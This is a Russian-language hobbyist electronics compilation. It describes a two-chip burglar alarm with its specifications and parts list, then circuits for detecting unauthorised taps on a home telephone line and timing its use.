Помехозащищенность релейного автомата при воздействии внешнего электромагнитного поля;

дБ, не менее .......................... 100

Срок службы, ч, не менее .................. 4000

Вероятность безотказной работы устройства при риске заказчика в = 0,9, не менее ........ 0,98

кпд, %,не менее ........................ 82

Условия эксплуатации:

температура окружающей среды, °С ........ —25...+45

относительная влажность воздуха при температуре 22 °С, %, не более ................... 95±3

пониженное атмосферное давление воздуха, кПа (мм рт. ст.) ......................... 53,3 (400)

Рис. 3.14. Принципиальная схема релейного сторожевого устройства с пятизначным шифром.

Изображение: 

Таблица 3.13. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в релейном сторожевом устройстве с пя

Изображение: 

3. 9. Сторожевое устройство на двух микросхемах

3.9. СТОРОЖЕВОЕ УСТРОЙСТВО НА ДВУХ МИКРОСХЕМАХ

Электронное сторожевое устройство, предлагаемое к изготовлению в домашней мастерской, представляет собой полууниверсальную простую систему со световой сигнализацией, которая может быть установлена в городских квартирах, офисах, производственных помещениях, на садово-огородных участках и т. д. Устройство рассчитано на эксплуатацию в самых жестких климатических условиях при

воздействии механических нагрузок. Устройство достаточно устойчиво работает при температуре от -40 до 40 °С и при относительной влажности воздуха до 90+_3% при температуре 20 °С, а также при пониженном атмосферном давлении воздуха до 5 мм рт. ст. Работает сторожевое устройство от сети переменного тока напряжением 127 или 220 В частотой 50 Гц и преобразователя напряжения плюс 15 — ноль — минус 15 В.

Автоматическое устройство может применяться для охраны средств подвижного транспорта и может работать от бортовой электросети постоянного тока напряжением до 12 В. Сигнальные цепи, развернутые по периметру охраняемых объектов или территорий, обеспечивают мгновенное срабатывание системы при размыкании контактов конечных выключателей, но сигнал тревоги подается с задержкой.

Сторожевое устройство, собранное на двух ИМС, характеризуется малым потреблением электроэнергии как в рабочем, так и в холостом режимах эксплуатации. Оно обеспечивает временную задержку срабатывания системы световой сигнализации после несанкционированного вторжения на охраняемый объект, что дает возможность владельцу сторожевого устройства установить систему в исходное состояние до того, как оно будет приведено в действие и подаст сигнал тревоги. После срабатывания электронной схемы управления сигналы тревоги раздаются тоже не сразу, а через определенный промежуток времени: после того как сигнальная цепь будет разомкнута. Время подачи звукового сигнала или сирены ограничено работой специального таймера. Также устройство характеризуется автоматическим возвратом в начальное состояние после подачи сигналов тревоги и возвращением в ждущий режим эксплуатации с помощью ручного управления; возможностью установки сигнальных устройств тревоги и оповещения у соседей по квартире и по месту охраняемого объекта; скрытностью установки источника сигнализации и кнопок управления; максимальной защищенностью от ложных срабатываний.

Сигнальная цепь может быть выполнена в различных конструктивных исполнениях, которые определяются материально-техническими возможностями домашнего мастера и оснащением его радиолюбительской лаборатории. Сигнальная цепь может иметь практически неограниченную протяженность по периметру охраняемого объекта, но ее общее сопротивление не должно превышать 10 кОм. В качестве наиболее простых элементов сигнализации могут быть применены герконы, микропереключатели, контактные соединители, разрывные цепи.

Вся сигнальная цепь в ждущем режиме работы должна быть замкнута, и по ней должен протекать незначительный электрический ток, определенный данным схемным значением. И пока по этой цепи течет электрический ток, сигнальная система на внешние электромагнитные поля и другие излучатели энергии не реагирует. Необходимо отметить, что даже мощный сигнал тревоги после срабатывания устройства не создает больших неудобств соседям, так как действует (работает) определенное и заранее заданное время, после чего автоматически отключается и приходит в исходное состояние.

На рис. 3. 15 приведена принципиальная электрическая схема сторожевого устройства на двух микросхемах и семи транзисторах. Схема обладает высокой степенью универсальности, очень проста по составу комплектующих ЭРИ и ЭРЭ и легко читается.

Электронное сторожевое устройство включает в свой состав входные электрические цепи питания, сетевой понижающий трансформатор питания 77 унифицированной конструкции из серии «Габарит», выпрямительное устройство с емкостным фильтром, сигнальную цепь, электронный управляющий блок и выходные сигнальные цепи.

К сети переменного тока устройство подключается с помощью электрического соединителя XI типа «вилка» и электрической штепсельной розетки, рассчитанной на прохождение тока нагрузки до 6 А. Включается и выключается устройство с помощью однополюсного переключателя S1. На входе питающей сети установлен плавкий предохранитель F1, защищающий входные цепи от коротких замыканий и перегрузок, которые могут возникнуть из-за ошибок при сборке и монтаже и при неправильном включении первичных обмоток трансформатора.

Неоновая лампочка H1 тлеющего разряда сигнализирует о готовности устройства к эксплуатации. При включении устройства в сеть и замыкании контактов переключателя S1 лампочка H1 загорается, что свидетельствует о подаче переменного напряжения на первичную обмотку сетевого трансформатора. Конденсаторы С9 и С10, включенные на входе параллельно первичной обмотке трансформатора, защищают устройство от низкочастотных помех, проникающих к сеть питания переменного напряжения.

Сетевой понижающий трансформатор питания Т1 броневой конструкции изготавливается на магнитопроводе из электротехнической стали марки 3312 толщиной от 0, 2 до 0, 5 мм типоразмера ШЛМ 25Х32 с уменьшенным расходом меди. Унифицированный трансформатор имеет две разнесенные первичные обмотки и шесть вторичных обмоток с соответствующими обозначениями. На рис. 3. 15 показано подключение трансформатора к сети неременного тока напряжением 220 В. Для того чтобы включить устройство в сеть с напряжением 127 В, необходимо соединить выводы обмоток 1 и 6, 4 и 9, а напряжение 127 В подать на выводы 1 и 4 (6 и 9). На вторичных обмотках унифицированного трансформатора действуют следующие неременные напряжения: на выводах 11 и 12 — напряжение 5 В; 13 и 14 — 5 В; 15 и /б — 10 В; 17 и 18 — 10 В; 19 и 20 — 2,6 В; 21 и 22 — 2,6 В под нагрузкой. Номинальное значение тока на вторичной обмотке трансформатора не превышает 0,88 А. Вместо унифицированного покупного трансформатора можно применить самодельный трансформатор, который изготавливается по данным, приведенным в табл. 3.14.

Сетевой понижающий трансформатор Т1 обеспечивает расчетный уровень выпрямленного напряжения постоянного тока на выходе, полную гальваническую развязку вторичных цепей устройства от высокого напряжения переменного тока первичной сети и дополнительную электробезопасность при эксплуатации сторожевого устройства с низким напряжением на выходе вторичных обмоток.

Выпрямительное устройство собрано по двухполупериодной схеме со средним выводом вторичной обмотки на двух выпрямительных диодах малой мощности и работает на емкостный фильтр, выполненный на оксидном конденсаторе С1. Выпрямитель по такой схеме характеризуется невысоким уровнем пульсации выпрямленного напряжения, уменьшенным количеством примененных выпрямительных диодов и достаточно высоким обратным напряжением, действующим на комплекте выпрямительных диодов. Применяется выпрямитель со средней точкой в устройствах малой и средней мощности нагрузки.

Сторожевое устройство работает следующим образом. После замыкания контактов переключателя S1 и включения электропитания напряжение начинает поступать на

Таблица 3.14. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на двух микросхемах

3-91.jpg

сетевой понижающий трансформатор Т1 и загорается индикаторная лампочка H1, само сторожевое устройство при замкнутых контактах конечных выключателей В1 переходит в дежурный режим работы. К контактам Х2 и ХЗ можно подключить практически любое количество контактных групп и конечных выключателей. Использование ИМС в режиме ожидания дает значительный выигрыш в потреблении электроэнергии, которая не расходуется в периоды времени от момента автоматического включения до момента следующего включения. Примененные в сторожевом устройстве микросхемы серии К561ЛА7 относятся к параметрическому ряду ИМС, состоящих из комплекса микромощных микросхем второй и третьей степени интеграции на транзисторах, выполненных поспециальней технологии, и характеризуются жесткими требованиями к потребляемой энергии, массе, габаритным размерам в условиях значительного изменения напряжения питания при работе от одного источника. Диапазон напряжений электропитания микросхем серии К561 лежит в пределах от 3 до 15 В, допустимый уровень пульсации напряжения постоянного тока не превышает 0,2 В. Минимальное напряжение высокого уровня логической единицы на выходе микросхемы: 3, 6 В при напряжении питания 5 В и 7, 1 В при напряжении 10 В. Максимальное напряжение низкого уровня логического нуля на входе микросхемы: 1, 4 В при напряжении питания 5 В и 2, 9 В — при 10 В. Для нормальной работы микросхемы длительность фронтон входных импульсов должна быть не более 10, 5 и 1 мкс при напряжении питания 5, 10 и 15 В.

В соответствии с принятой классификацией ИМС БИС функциональный состав микросхемы с обозначением ЛА7 включает в себя четыре логических элемента 2И-НЕ. В данном случае два элемента каждой микросхемы являются таймерами, работающими в общей схеме управления.

При замкнутых контактах выключателя В1 таймеры микросхемы не работают. В это время на выходе третьего элемента второй ИМС DA2 (вывод 10) действует высокий уровень логической единицы, а это значит, что на обоих входах третьего элемента ИМС DA1 (выводы 8 и 9) также действует высокий уровень логической единицы.

При размыкании контактов переключателя В1 на входе третьего элемента ИМС DA1 (вывод 9) через резистор R3 появляется низкий уровень логического нуля, а его выход (вывод 10) переходит в состояние высокого уровня логической единицы. Включенные в схему резистор R3 и конденсатор С2 обеспечивают защиту устройства от ложных сигналов срабатывания, возникающих в результате электромагнитных наводок в соединительных цепях. После того как на выходе третьего элемента ИМС DA1 (вывод 10) появляется высокий уровень логической единицы, открывается транзистор VT2. Время открывания транзистора зависит от емкости конденсатора С5 и сопротивления резистора R12. Открывание транзистора VT2 приводит к разрядке конденсатора С4 и к срабатыванию первого таймера, собранного на первых двух элементах ИМС DA 1 (выводы 1—6). Для четкого завершения цикла работы первого таймера вход 1 первой ИМС соединен с выходом третьего элемента второй ИМС DA2 (выводы 8 и 9), которые остаются в состоянии логического нуля до тех пор, пока работает таймер. Как только первый таймер завершит свой цикл, выход третьего элемента второй ИМС DA2 (вывод 10) снова переходит в состояние высокого уровня логической единицы, и при этом на короткое время открывается транзистор VT4. Открывание транзистора VT4 обеспечивает запуск второго таймера после зарядки конденсатора С7. Второй таймер собран на двух элементах ИМС DA2 (выводы 1, 2,3 и 4, 5, 6).

С целью создания напряжения электропитания ИМС в устройстве собран параметрический стабилизатор на стабилитроне VD3, транзисторе VT1 и резисторе R2.

Сигнал, снимаемый с выхода второго таймера, преобразуется транзисторами VT3 и VT5 с напряжения 7, 5 В до значения напряжения источника постоянного тока. Транзисторы VT6 и VT7 образуют усилитель мощности, который обеспечивает в свою очередь четкое срабатывание ИМ. В качестве ИМ можно применить электромагнитное реле типа РЭС-10, которое подключается своей обмоткой к электрическим соединителям Х5 и Х6. Контакты этого реле, не показанные на схеме, замыкают соответствующие питающие цепи исполнительных звуковых и световых элементов.

При изготовлении универсального сторожевого устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К561ЛА7, DA2 — К561ЛА7; транзисторы VT1 типа КТ3102Д, VT2 — КТ3102Д, VT3 — КТ3102Д, VT4 — КТ3102Д, VT5 — КТ3102Д, VT6 — КТ3107Б, VT7 — КТ933Б;

стабилитрон VD3 типа Д814А; выпрямительные диоды VD1 типа КД204В, VD2 — КД204В, VD4 — КД521А, VD5 — КД521А, VD6 — КД521А, VD7 — КД521А, VD8 — КД521А, VD9 — КД521А, VD 11 — КД223; светодиод VD10 типа АЛ307А;

сетевой понижающий трансформатор питания Т1 унифицированной конструкции типа ТНП258-127/220-50; индикаторная лампочка H1 ТH-0,2-1; конденсаторы С1 типа К50-6-50В-200 мкф, С2 — К53-1А-20В-22 мкФ, СЗ — К73-17-63В-1 мкФ, С4 — К73-17-63В-1 мкф, С5 — КМ-5-50В-0. 1 мкФ, С6 — К73-17-63В-1 мкФ, С7 — К73-17-63В-1 мкФ, С8 — КМ-5-50В-0. 1 мкФ; резисторы R1 типа ВСа-2-200 кОм, R2 — ВСа-0, 5-2, 2 кОм, R3 -ВСа-0, 5-5, 6 кОм, R4 — ВСа-0, 25-10 МОм, R5 — ВСа-0, 25-10 кОм, R6 — ВСа-0, 25-330 кОм, R7 — ВСа-0, 25-1 МОм, R8 — ВСа-0, 25-10 МОм, R9 — ВСа-0, 25-10 кОм, R10 — ВСа-0, 25-1 МОм, R 11 — ВСа-0, 25-2, 2 МОм, R12 — ВСа-0, 25-10 кОм, R13 — ВСа-0, 25-22 кОм, R14 — ВСа-0, 5-22 кОм, R 15 — ВСа-0, 25-10 кОм, R16 — ВСа-0, 25-22 кОм, R 17 — ВСа-0, 25-10 кОм, R 18 — ВСа-0, 25-22 кОм, R19 — ВСа-0, 25-1, 8 кОм; плавкий предохранитель F1 типа ПМ-1-1А с держателем предохранителя; переключатели S1 типа П1Т-1-1, S2 — КМ1-1; электрические соединители X1 типа «вилка», Х2, ХЗ — КМЗ-1.

При изготовлении, регулировке, настройке и ремонте сторожевого устройства некоторые комплектующие изделия и ЭРЭ можно заменить без ухудшения основных электрических параметров и эксплуатационных характеристик. Например, резисторы типа ВСа можно заменить любыми постоянными резисторами типа МЛТ, ОМЛТ, МТ, УЛИ, Cl-4, C2-8; конденсаторы типа К73-17 — на К73-16, К73-11, К78-2, конденсаторы типа КМ-5 — на К10У-5, К10-17, КМ-6; выпрямительные диоды типа КД521А — на КД509А, Д220, Д220А, Д220Б, Д312; транзистор типа КТ3102Д — на КТ3102Е, КТ3107Е, КТ3107Ж, транзистор типа КТ933Б — на КТ939А, КТ644А, ГТ906АМ; ИМС типа К561ЛА7 — на 564ЛА7.

Основные электрические параметры и технические характеристики сторожевого устройства на двух микросхемах

Номинальное напряжение питающей сети

переменного тока, В.................... 220 или 127

Номинальная частота питающей сети переменного тока, Гц................... 50

Номинальное напряжение автономною источника

питания постоянного тока, В............... 12

Пределы изменения напряжения питающей сети переменного тока, В.................... 180... 240 или

110... 140 Пределы изменения частоты питающей сети переменного тока, Гц................... 49, 5... 50, 5

Пределы изменения напряжения автономного источника питания постоянного тока, В....... 9... 14

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более............. 12

Время срабатывания системы, мс, не более...... 0, 2

Время задержки подачи сигнала тревоги после срабатывания системы, с............. 3... 30

Время подачи сигнала тревоги, мин........... 1... 10

Количество одновременно охраняемых объектов, шт. 1... 20 Сопротивление шлейфа, кОм, не более......... 10

Сопротивление изоляции токоведущих контактных групп и проводников устройства, подключающих конечные выключатели, МОм, не менее.............. 10

Помехозащищенность устройства от ложных срабатываний при воздействии внешних электромагнитных помех, дБ, не менее........ 100

Напряжение переменного тока на выводах обмоток сетевого трансформатора 77, В:

2 и 4............................. 110

7 и 9............................. 110

11 и 12........................... 5

13 и 14........................... 4, 95

15 и 16............................ 10

17 и 18........................... 10

19 и 20........................... 2, 6

21 и 22........................... 2, 6

Номинальное напряжение питания ИМС, В...... 7, 5

Максимальная выходная мощность сетевого

трансформатора питания 77, Вт........... 30

Срок службы, ч, не менее.................. 10 000

Вероятность безотказной работы сторожевого

устройства при риске заказчика в=0, 92, не менее 0, 98

кпд, %, не менее........................ 96

Условия эксплуатации:

температура окружающей среды, °С........ —25...+ 40

относительная влажность воздуха при температуре

окружающей среды 25°С, %, не более...... 90±3

атмосферное давление воздуха, мм рт. ст..... 200... 1000

t71.jpg

Рис. 3.15. Принципиальная схема сторожевого устройства на двух микросхемах.

Рис. 3.15. Принципиальная схема сторожевого устройства на двух микросхемах.

Изображение: 

Таблица 3.14. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на двух микро

Изображение: 

5. Литература.

Литература

 

Векслер Г. С.Расчет электпитающих устройств. Киев: Техника, 1978.—207 с.

Вересов Г. П. Электропитание бытовой радиоэлектронной аппаратуры.— М.: Радио и связь, 1983.— 128 с.

Верховцев О. Г., Лютое К. П. Практические советы мастеру-любителю: Электроника. Материалы и их применение.—3-е изд., перераб. и доп.—СПб.: Энергоатомиздат. СПб. отделение, 1991.—272 с., ил.

Сидоров И. Н., Скорняков С. В. Трансформаторы бытовой радио электронной аппаратуры: Справочник.—М.: Радио и связь, 1994.— 320 с., ил.—(Массовая радиобиблиотека; вып. 1186).

Справочная книга радиолюбителя-конструктора / А. А. Бокуняев, Н. М. Борисов, Р. Г. Варламов и др.; Под ред. Н. И. Чистякова.— М.:

Радио и связь, 1990.—624 с., ил,—(Массовая радиобиблиотека; вып. 1147).

Справочник конструктора РЭА: компоненты, механизмы, надежность / Н. А. Барканов, Б. Е. Бердичевский и др.; Под ред. Р. Г. Варламова.—М.: Радио и связь, 1985.—384 с.

Терещук Р. М. и др. Полупроводниковые приемоусилительные устройства: Справочник радиолюбителя / Р. М. Терещук, К. М. Терещук, С. А. Седов.— 4-е изд., стер.— Киев: Наук. думка, 1989.— 800 с., ил.— Библиогр.: с. 795—800.

Устройства электропитания бытовой РЭА: Справочник / И. Н. Сидоров, М. Ф. Биннатов, Е. А. Васильев.—М.: Радио и связь, 1991.—472 с., ил.

Шленциг К., Штаммлер В. Самодельные электронные устройства в быту: Пер. с нем.—М.: ДОСААФ, 1984.— 144 с., ил.

3. Способы защиты от телефонного пиратства.

Раздел 3.

1.Основные определения и классификация способов подключения и защиты

1. Основные определения и классификация способов подключения и защиты.

2.Организационные способы защиты от телефонного пиратства.

2. Организационные способы защиты от телефонного пиратства.

3.Устройства пассивной технической защиты.

3. Устройства пассивной технической защиты.

3.1. Способы получения информации о подключении.

3.1. Способы получения информации о подключении

Основные технические способы получения информации о постороннем включении в линию базируются на следующих признаках:

• отсутствие напряжения в телефонной линии;

• падение напряжения в линии в 3-4 раза при положенной трубке основного ТА;

• наличие импульсов набора номера при положенной трубке ТА;

• наличие частотных посылок DTMF кода при неиспользовании основного ТА;

• непрохождение вызова с АТС на основной ТА.

Большинство отечественных АТС имеют рабочее напряжение 60 В постоянного тока. Для индикации состояния линии с успехом может быть применена схема, приведенная на Рис.5.

Данная схема позволяет отследить:

• падение напряжения в линии до уровня 35В;

•наличие импульсов набора номера частотой 10 Гц;

• наличие вызывного сигнала частотой 25 Гц;

• пропадание напряжения в линии (при наличии независимого источника питания микросхемы DD1.1.

3-11.jpg

В состав схемы входят:

• мост униполярного подключения — VD 1 -VD4;

• специальный делитель контроля падения напряжения — VD5, Rl, VD6, R2;

• переключающий элемент И-НЕ —DD 1.1.

Сочетание в делителе резистивных (Rl, R2) и нелинейных элементов (в частности, стабилитрона VD6) позволяет подключить элемент DD1.1 непосредственно к линии, а также получить порог переключения элемента DD1.1 не ниже 35 В. В результате, данная схема может уверенно отработать падение напряжения как при установке у абонента, так и при установке на кроссе АТС. Рис. 6 поясняет сказанное.

3-12.jpg

Следует учитывать, что для отдаленных от АТС абонентов эквивалентное сопротивление линии может составлять Rэкв ~ 1 кОм, что затрудняет работу устройства индикации, включающего только резистивный делитель (без стабилитрона), вследствие большой разницы в уровнях напряжений на коротком (Rэкв = 0) и длинном (Rэкв > 500 Ом) шлейфе.

Схема на Рис. 5 свободна от этих недостатков и применяется в различных устройствах индикации и защиты. Очевидно, что с помощью данной схемы невозможно принять DTMF-посылки набора номера, но сам момент снятия трубки на пиратском аппарате регистрируется однозначно, что позволяет использовать данную схему во всех режимах подключения.

В дополнение на Рис. 7 приведена схема индикатора состояния линии с использованием транзистора. В данной схеме используется обычный резистивный делитель Rl, R2. В качестве ключа применяются кремниевые транзисторы

КТ3102 или КТ315. Подбор уровня срабатывания осуществляется изменением R2 при настройке схемы. Обычно он не превышает 30 В и позволяет регистрировать те же режимы, что и схема на Рис. 5.

3-13.jpg

Рис. 5. Индикатор состояния линии

Изображение: 

Рис. 6 Эквивалентная схема проводного шлейфа АТС-ТА

Изображение: 

Рис. 7 Датчик состояния линии на транзисторе

Изображение: 

3.2. Совмещенный индикатор подключения и обрыва телефонной линии.

3.2. Совмещенный индикатор подключения и обрыва телефонной линии

В соответствии с описанным выше способом контроля напряжения в линии разработан совмещенный индикатор подключения и обрыва линии [2]. Схема приведена на Рис.8.

3-21.jpg

В состав схемы входят:

• Диодный мост для подключения линии без учета полярности—VD1-VD4;

• Датчик напряжения — VD5, R1, VD6, R2, VD7, С1,DD1.1;

• Фильтр вызова АТС, 25 Гц, — R3, С2, DD1.2;

• Инверторы — DD1.3, DD2.2;

• Генератор 2.5 кГц — DD1.4, DD2.1, R4, СЗ;

• Ключ—R5,VTl;

• Звукоизлучающий элемент — пьезоизлучатель ЗП-3.

Принцип работы схемы заключается в следующем. В исходном состоянии блок индикатора подключается параллельно используемому телефонному аппарату. При наличии в линии напряжения свыше 40 В на входе элемента DD1.1 присутствует уровень логической единицы, и, в соответствии с этим, генератор 2.5 кГц заперт.

При поступлении вызова с АТС амплитудой 100 В и частотой 25 Гц специально расчитанная цепочка фильтра R3, С2 не позволяет переключить элемент DD1.2 и включить звукоизлучатель ЗП. Если же на каком-то участке линии была снята трубка (либо произошел обрыв) более чем на 1 сек., на входе DD1.1 появится нулевой уровень, и с указанной задержкой переключится DD1.2. Далее включится генератор 2.5 кГц, звукоизлучатель ЗП подаст непрерывный звуковой сигнал, сигнализирующий об использовании или обрыве линии. При возвращении линии в исходное состояние (напряжение более 40 В) индикатор вновь переходит в ждущее состояние. Возможна доработка индикатора триггерной схемой для индикации попытки использования (обрыва) линии и после установления в линии номинального напряжения.

Питание индикатора встроенное — батарея 9 В ("Крона", "Корунд"...).

Благодаря высоким значениям Rl, R2, индикатор абсолютно не влияет на параметры линии в соответствии с ГОСТом. Естественно, что индикатор будет срабатывать и при подъеме трубки (ведении разговора) и самим хозяином линии. Можно порекомендовать встроить выключатель или выполнить индикатор в виде заглушки, подключаемой вместо телефонного аппарата.

Рис. 8 Совмещенный индикатор подключения и обрыва линии

Изображение: 

3.3. Световой индикатор с автоматическим отключением.

3.3. Световой индикатор с автоматическим отключением

Для того, чтобы индикатор подключения не срабатывал при снятии трубки хозяином телефонной линии, необходимо ввести режим автоматического отключения. В этом случае индикатор включается последовательно с телефонным аппаратом через датчик тока. Принципиальная схема такого устройства приведена на Рис. 9.

В состав схемы входят:

• датчик напряжения — VD1, R1, VD2, R2, DD1.1;

• датчик тока — R5, VT2, R6, DD1.2;

• ключ включения светодиода — R3, VT1,R4,

HL1;

• схема автоматического отключения — R7, С1, DD1.3,VD3;

• элемент питания 9 В.

3-31.jpg

Принцип действия индикатора заключается в следующем.

Светодиод HL1 загорается в случаях:

• снижения напряжения в линии ниже 35В (попытка нелегального подключения);

• обрыва телефонной линии;

• прохождения сигнала вызова АТС — 25 Гц. Включение ключа VT1 происходит высоким уровнем с выхода 3 DD1.1 через R3. При снятии трубки телефонного аппарата с задержкой ~1с (определяется R7,C1) переключается элемент DD1.3 и принудительно поддерживает "0" на базе VT1, отключая тем самым HL1. Если кроме световой сигнализации в схему введена звуковая, она также будет выключаться при снятии трубки основного защищаемого ТА.

Рис. 9 Световой индикатор с автоматическим отключением

Изображение: 

3.4. Автоманический сигнализатор со звуковой индикацией.

3.4. Автоматический сигнализатор со звуковой индикацией

Еще один вариант индикатора подключения к линии с автоматическим отключением во время разговора хозяина телефона приведен в [3].

Сигнализатор устанавливается на входе абонентской линии в квартиру последовательно с защищаемым телефонным аппаратом. Благодаря внешнему источнику питания 9 В, сигнализатор реагирует, как на попытку параллельного набора, так и на обрыв линии.

Принципиальная схема устройства приведена на Рис. 10.

3-41.jpg

В состав схемы входят:

• датчик падения напряжения — VD1, VD2, R2, VT2;

• датчик тока—Rl,VD3,VD4,VTl;

• ключ включения звукового генератора — DA1;

• блокировочная емкость — С 1;

• генератор — VT3, VT4, R4;

• источник питания 9 В ("Крона") — GB 1;

• телефонный капсюль ТА56М — BF 1.

Принцип действия схемы заключается в следующем.

При положенной трубке напряжение в линии составляет 60 В, которого достаточно для открывания стабилитронов VD1, VD2. Транзистор VT2, соответственно, открыт, а ключ DA1 закрыт ("0" на управляющем входе 1, 8 DA1).

При снижении напряжения в линии в два раза стабилитроны VD1, VD2 закрываются и, соответственно, закрывается VT2, а ключ DA1 открывается через резистор R3, замыкая, тем самым, цепь питания звукового генератора, собранного на VT3, VT4.

Если трубка была поднята на своем телефоне (основной ТА), через резистор R1 протекает ток достаточный, чтобы открыть транзистор VT1 и закрыть VT2, DA1. Сигнала тревоги нет. Блокировочный конденсатор С1 необходим для того, чтобы устройство не срабатывало при наборе номера.

После окончания разговора с пиратского аппарата (трубка положена) звуковой генератор отключается практически мгновенно.

Рис. 10 Автоматический сигнализатор со звуковой индикацией

Изображение: 

3.5. Индикатор нерезонансного включения.

3.5. Индикатор нерезонансного включения

Как уже отмечалось, под резонансной настройкой телефонного аппарата понимается работа оборудования АТС с конкретным телефонным аппаратом. В случае подключения телефона с другими характеризующими его параметрами или подсоединении в другой точке шлейфа АТС - абонент, происходит рассогласование (непопадание в резонанс), что приводит к срабатыванию индикатора.

Характеризующие параметры могут быть следующими:

• эквивалентное сопротивление ТА при поднятой трубке;

• эквивалентное сопротивление при положенной трубке;

• индивидуальные параметры номеронабирателя;

• комплексное сопротивление разговорной части;

• ток потребления при вызове;

• ток потребления в разговорном режиме;

• прочие параметры (распределение зарядов, изменение волнового сопротивления двухпроводной линии при включении ТА и др.).

Рассмотрим простейший случай настройки в резонанс по эквивалентному сопротивлению ТА при поднятой трубке.

На Рис. 11 приведена эквивалентная схема пиратского подключения в различных зонах.

3-51.jpg

R — последовательное включенные эквивалентные сопротивления, имитирующие длинный шлейф АТС-абонент;

Rr — поднятая трубка основного телефона;

Rn — поднятая трубка пиратского телефона;

КТ1-КТ4 — возможные точки подключения пиратского аппарата в различных зонах. Совершенно очевидно, что суммарное сопротивление Rcум = 6*R +Rт однозначно определяет падение напряжения на выходных клеммах АТС (в точках КТ1), это нулевой уровень настройки Ео.

Изменение типа телефонного аппарата ведет к изменению Rт, а значит, к изменению тока питания телефона, соответственно, к колебаниям Ео. Подобные изменения тем значительнее, чем короче длина шлейфа (меньше значение R). В свою очередь, подключение

пиратского аппарата в точках КТ1-КТ4 ведет к резкому изменению Rсум. Для различных зон Rсум будет следующим.

Зона 1 — Rсум1 =Rп Зона 2 — Rсум2 = 2*R +Rп Зона 3 — Rсум3=4*R + Rп 3oнa4—Rсум4 =6*R+Rп

Как видно, изменения довольно значительные (заметим, что порядок значений R, Rт, Rп составляет около 500 Ом). В результате анализа схемы выясняется замечательная возможность — по падению напряжения в линии на выходных клеммах АТС судить о зоне включения пиратского аппарата. Естественно, система требует настройки. На Рис. 12 приведена принципиальная схема датчика нерезонансного подключения с индикацией зоны.

Датчик включается в точках КТ1 шлейфа. В нем предусмотрена светодиодная сигнализация зоны подключения.

В состав схемы входят:

• диодный мост униполярного подключения VD1-VD4;

• делители по зонам — R1, R5; R2, R6; R3, R7;

R4, R8;

• триггеры шмитта (в качестве пороговых элементов) — DD 1.1 -DD 1.4;

• ключи включения светодиодов HL1-HL4 — VT1-VT4;

• источник питания 9 В.

3-52.jpg

Принцип действия схемы очевиден и прост. При включении ТА в линию на различных участках шлейфа (четыре зоны) на входе устройства формируется, соответственно, один из четырех уровней напряжения Ео — U1, U2, U3, U4. Численные значения этих уровней были выявлены в результате экспериментов на длинном шлейфе реальной телефонной линии при подключенном стандартном ТА.

Настройка схемы производится следующим образом.

Параллельно индикатору включается вольтметр и переменное сопротивление R-настр (показано пунктиром). Регулировкой Rнастр добиваются показаний вольтметра 20 В и далее резистором R5 находят точку включения HL1 (зона 1). Далее, получают напряжение 25 В и резистором R6 включают светодиод HL2 (зона 2) и т.д.

При такой настройке при снятии трубки основного ТА будут загораться несколько светодиодов (в зависимости от зоны включения). Если аппарат включен в зоне 4, будут гореть все светодиоды, в зоне 3 — 3 светодиода и т.д.

Данная схема должна рассматриваться скорее как простейший вариант резонансного датчика.

Некоторые цифровые АТС позволяют запрограммировать работу абонента с определенным ТА (идентификация по цифровому коду), что также можно рассматривать как способ "цифровой резонансной настройки".

Рис. 11 Эквивалентная схема пиратского подключения в различных зонах

Изображение: 

Рис. 12 Датчик нерезонансного подключения с индикацией зоны

Изображение: 

3.6. Счетчик времени разговора.

3.6. Счетчик времени разговора

Если совместить схему индикатора состояния линии с электронными часами, можно получить простои счетчик времени разговора. Заметим, что если индикатор линии реагирует как на попытку набора, так и на обрыв линии, то счетчик позволит произвести оценку времени пиратского

подключения во время отсутствия хозяина телефона. Получается своеобразный индикатор с памятью.

Привязку датчика состояния линии с часами легче всего производить по запуску кварцевого задающего генератора. Тогда, часы запускаются при падении напряжения в линии ниже установленного уровня (разговор или обрыв) и останавливаются после восстановления уровня 60 В (окончание разговора).

Если часы не обнулять, то счетчик времени суммирует время всех разговоров в течение суток и более (до 24-х часов разговорного времени). Счетчик времени может быть также применен для анализа частоты использования телефонного аппарата.

Для примера, на Рис. 13 представлена схема счетчика времени разговора с задающим генератором на микросхемах 561 серии.

В исходном состоянии, когда на линии 60 В, вход 1 DD2.1 шунтируется диодом VD9 на корпус. Задающий генератор выключен, счет часов остановлен. При снятии трубки на линии, на выходе 10 DD1.3 с задержкой в 1 с (R4, С1) появляется логическая единица, осуществляя запуск генератора. Счет времени осуществляется пока на выходе 10 DD1.3 не появится логический "ноль" (через 1 с после появления на линии напряжения 60 В).

По описанному принципу можно осуществить сопряжение датчика линии с любыми другими схемами электронных часов. Для конструирования желательно использовать готовые часы с питанием от батареек, так как в этом случае осуществляется страховка от пропадания напряжения в сети 220 В.

3-61.jpg

Рис. 13 Счетчик времени разговора - принципиальная схема

Изображение: 

3.7 Схема запуска счетчика времени для фиксирования исходящей связи.

3.7. Схема запуска счетчика времени для фиксирования исходящей связи

Предыдущая схема (Рис. 13) предусматривала срабатывание счетчика времени во всех режимах связи:

• обрыв линии;

• попытка пиратского подключения;

• использование телефона хозяина линии при исходящей связи;

• входящая связь.

В случае, когда абонент желает контролировать лишь время исходящей связи с основного телефонного аппарата. для запуска кварцевого генератора часов следует применять схему, приведенную на Рис. 14.

В состав схемы входят:

• датчик тока—R1,VТ1,R2,DD1.1;

• фильтр индукторного вызова — R4, СЗ;

• формирователь импульса цифры номера — VD3,R5,C2,DD1.2,C5;

• счетчик набранной цифры — DD2;

• инвертор включения генератора — DD1.4;

• цепь питания микросхем — VD 1, R3, С 1, VD2.

Данная схема позволяет:

• включить счетчик времени после снятия трубки и набора первых 3-х цифр номера (исходящая связь);

• выключить счетчик после окончания разговора (погрешность 2-4 с);

• исключить отсчет времени в случае входящей связи (номер не набирался), а также при параллельном подключении к линии.

3-71.jpg

